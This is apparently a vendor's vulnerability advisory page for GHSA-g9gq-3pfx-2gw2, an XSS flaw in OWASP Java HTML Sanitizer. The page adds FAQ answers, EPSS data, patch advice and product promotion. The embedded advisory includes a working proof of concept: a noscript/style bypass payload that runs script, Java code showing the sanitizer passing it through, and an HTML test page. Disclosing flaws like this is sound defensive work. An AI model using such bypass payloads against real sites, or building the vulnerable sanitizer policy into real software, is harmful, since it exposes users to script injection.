How severe is GHSA-g9gq-3pfx-2gw2?

No CVSS score has been assigned to GHSA-g9gq-3pfx-2gw2 yet. Review the advisory details and affected package list to assess your exposure.

How do I fix GHSA-g9gq-3pfx-2gw2?

Update com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer to 20260101.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-g9gq-3pfx-2gw2 is resolved across your whole dependency graph.

How do I detect GHSA-g9gq-3pfx-2gw2 in my Maven dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-g9gq-3pfx-2gw2 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-g9gq-3pfx-2gw2?

O3 pinpoints whether GHSA-g9gq-3pfx-2gw2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-g9gq-3pfx-2gw2 actively exploited in the wild?

No public exploit code has been indexed for GHSA-g9gq-3pfx-2gw2 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-g9gq-3pfx-2gw2?

GHSA-g9gq-3pfx-2gw2 has an EPSS (Exploit Prediction Scoring System) score of 0.2%, placing it in the 12th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

When was GHSA-g9gq-3pfx-2gw2 published, and has it been updated?

GHSA-g9gq-3pfx-2gw2 was published on November 25, 2025 and was last updated on February 4, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

☕ Maven

GHSA-g9gq-3pfx-2gw2

OWASP Java HTML Sanitizer is vulnerable to XSS via noscript tag and improper style tag sanitization

Also known asCVE-2025-66021

Published

Nov 25, 2025

Updated

Feb 4, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.2%probability of exploitation in next 30 days

Lower Risk12th percentile+0.21%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

☕com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Maven packages — download data is not available via public APIs for these ecosystems.

Description

Summary

It is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows noscript and style tags with allowTextIn inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy.

Details

The OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows noscript & style tag with allowTextIn inside style tags.

The following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except noscript and allow style tag with allowTextIn inside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceives noscript tags post sanitization.

PoC

Lets create a HtmlPolicyBuilder which allows p, noscript, style html tags and allows .allowTextIn("style").
There are two XSS payloads which very identical and only difference is one has p tag and other has noscript tag. These payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.

1. <noscript><style></noscript><script>alert(1)</script>
2. <p><style></p><script>alert(1)</script>

Run the following piece of code which sanitizes the payload.

public class main {
	private static final String ALLOWED_HTML_TAGS = "p, noscript, style";

	/**
	 * Description of vulnerability :
	 *  The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.
	 *  However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.
	 */

	public static void main(String[] args) {
		withAllowedTextAndStyleTag();
	}

	/**
	 *  Test case : Vulnerable to XSS
	 */
	public static void withAllowedTextAndStyleTag() {
		HtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();
		PolicyFactory policy = htmlPolicyBuilder
				.allowElements(ALLOWED_HTML_TAGS.split("\\s*,\\s*"))
				.allowTextIn("style")
				.toFactory();
		String untrustedHTMLOne = "<noscript><style></noscript><script>alert(1)</script>";
		String untrustedHTMLTwo = "<p><style></p><script>alert(1)</script>";

		System.out.println("PAYLOAD: " + untrustedHTMLOne +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLOne));
		System.out.println("PAYLOAD: " + untrustedHTMLTwo +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLTwo));
	}
}

Use the latest library version

		<dependency>
			<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
			<artifactId>owasp-java-html-sanitizer</artifactId>
			<version>20240325.1</version>
		</dependency>

Output of the POC code should look like this


PAYLOAD: <noscript><style></noscript><script>alert(1)</script>
SANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>


PAYLOAD: <p><style></p><script>alert(1)</script>
SANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>

Lets understand what happened in sanitization process below

--------------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS

-----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed. 
SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>

-------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS

--------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed. 
SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>

Lets create a sample html page and copy both sanitized output which should be generated in step 5


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>POC OF SANITIZER OUTPUT</title>
</head>
<body>

<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->
<noscript><style></noscript><script>alert(1)</script></style></noscript>

<!-- SAFE OUTPUT -->
<p><style></p><script>alert(1)</script></style></p>

</body>
</html>

Open this HTML page in the browser it should pop an alert.

Alt text

Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS.

SAFE from XSS

The payload which combined with noscript tag and style tag did caused XSS. The broswer perceived noscript and which wrapped style tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.

XSS POC

Impact

This potentially could leads to XSS in applications. Ref : https://owasp.org/www-community/attacks/xss/

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
☕Maven	`com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer`	≥ 20240325.1&&< 20260101.1	20260101.1

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer to 20260101.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-g9gq-3pfx-2gw2 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-g9gq-3pfx-2gw2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-g9gq-3pfx-2gw2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary It is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows `noscript` and `style` tags with `allowTextIn` inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy. ### Details The OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows `noscript` & `style` tag with `allowTextIn` inside style tags. The following condition is very edge case but if users combine a HtmlPolicyBuilder with any o

O3 Security · Impact-Aware SCA

Is GHSA-g9gq-3pfx-2gw2 in your dependencies?

O3 detects GHSA-g9gq-3pfx-2gw2 across Maven dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works